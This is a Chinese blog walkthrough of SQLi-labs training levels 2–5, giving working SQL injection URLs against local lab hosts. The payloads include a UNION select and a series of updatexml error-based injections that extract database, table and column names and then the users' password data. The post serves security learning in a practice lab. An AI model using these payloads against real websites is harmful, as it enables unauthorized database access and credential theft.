SQL labs-SQL注入(二)

已于 2024-07-23 16:34:08 修改
阅读量249 收藏 4
点赞数 3
分类专栏: sql注入 文章标签: sql 数据库
于 2024-07-23 16:31:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80280669/article/details/140620972
版权

环境搭建参考

SQL注入(一)

一,SQL labs-less2。

http://192.168.61.206:8001/Less-2/?id=-1 union select 1,2,group_concat(username , password) from users--+

与第一关没什么太大的不同,唯一区别就是闭合方式为数字型。

二,SQL labs-less3。

直接输入:

http://172.168.10.129:8001/Less-3/?id=1\

得到闭合符,其余步骤与less1,less2一致。

less4解题思路与3一致,在此不做赘述。

三,报错注入。

1,先找出闭合符。

2,报错注入,得到库名。


http://172.168.10.129:8001/Less-5/?id=1'and updatexml(1,concat(%2f,(select database()),%2f),1)--+

updatexml():括号内写目标文件,文件路径,修改内容。

ox3e:是“>”的16进制编码。

concat()  拼接输出。

3,以此类推,得到表名。

http://172.168.10.129:8001/Less-5/?id=1' and updatexml(1,concat(0x3e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x3e),1)--+

4,得到敏感表名内部的字段名。

http://172.168.10.129:8001/Less-5/?id=1' and updatexml(1,concat(0x3e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name ='users'),0x3e),1)--+

5,得到敏感数据。

http://172.168.10.129:8001/Less-5/?id=1'and updatexml(1,concat(0x3e,(select group_concat(password)from users),0x3e),1)--+

影市
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-报错注入
dkxkl1314的博客
03-20 1014
靶场环境:sqli-labs-master。
SQL&sqli-labs-master
Jackie's Blog
04-03 712
SQL注入学习&个人sqli-labs-master靶场练习
SQL labs-SQL注入(六)
2302_80280669的博客
07-25 282
本文为SQL labs-SQL注入(四)的续作,依据sqllabs靶场,详细讲解手工post注入。
sql-labs 次注入
Khazking的博客
11-28 257
24.修改密码 update 次注入 1 原理 次注入是存储型注入,可以理解为构造恶意数据存储在数据库后,恶意数据被读取并进入到了SQL查询语句所导致的注入。恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL次注入。详细点来讲,就是在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来.
sqli-labs-master-注入学习靶机
01-19
`sqli-labs-master-注入学习靶机` 提供了一个模拟环境,帮助学习者深入理解SQL注入的工作原理,并提供实践机会来熟悉防御策略。 这个靶机教程由印度开发者创建,旨在帮助用户掌握SQL注入攻击的不同类型,以及如何...
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 353
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 218
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLynx数据库管理工具
core815的专栏
07-24 314
SQLynx数据库管理工具
SQL进阶技巧:如何使用差值累计计算思想巧解数学中递归计算问题
石榴姐yyds
07-23 508
本文给出了一种利用SQL语言如何解决数学上递归问题。解决问题的核心在于对差值累计计算的认识,差值累计计算的本质也就是数学中的迭代计算思想在SQL语言中的体现。本文中所描述的问题需要将上一行的计算结果拿出来放到下一行继续叠加,按照直观的思路需要用lag函数去取上一行值但是lag函数获取的往往都是明确的结果值,而这种需要动态计算,于是会走到递归计算的误区中,而需求中所描述的计算方式就是递归的思路,容易产生误解,但仔细推导我们不难发现其实就是每行按照固定的公式算出差值的累加,即 字段X的累计值减去字段Y的累计值等
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 448
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1275
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
使用sqlalchemy查询mysql的JSON字段
ithongchou的博客
07-23 157
首先,你需要定义一个与表格对应的模型类。
Qt基础 | QSqlTableModel 的使用
zwcslj的博客
07-24 819
Q_OBJECTprivate://数据库连接//数据模型//选择模型//数据映射//自定义数据代理,性别//自定义数据代理,部门//打开数据表//获取字段名称,填充“排序字段”的comboBoxpublic:// QTableView的SelectionModel的行发生了变化,进行处理private::用于加载数据库驱动和建立与数据库之间的连接:用于指定某个数据表 ,作为数据表的数据模型。
Python实现Java mybatis-plus 产生的SQL自动化测试SQL速度和判断SQL是否走索引
weixin_46294086的博客
07-23 967
编程精选网(www.codehuber.com),程序员的终身学习网站已上线!后端技术】、【前端领域】感兴趣的小可爱,也欢迎关注❤️❤️❤️ 【JavaGPT】❤️❤️❤️,我将会给你带来巨大的【收获与惊喜】💝💝💝!
深入理解 SQL 中的 DATEDIFF 函数
最新发布
一勺菠萝丶的博客
07-25 347
DATEDIFF此函数返回两个日期之间的天数差。具体来说,它计算从date2到date1的天数,如果date1晚于date2,结果为正;如果date1早于date2,结果为负。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值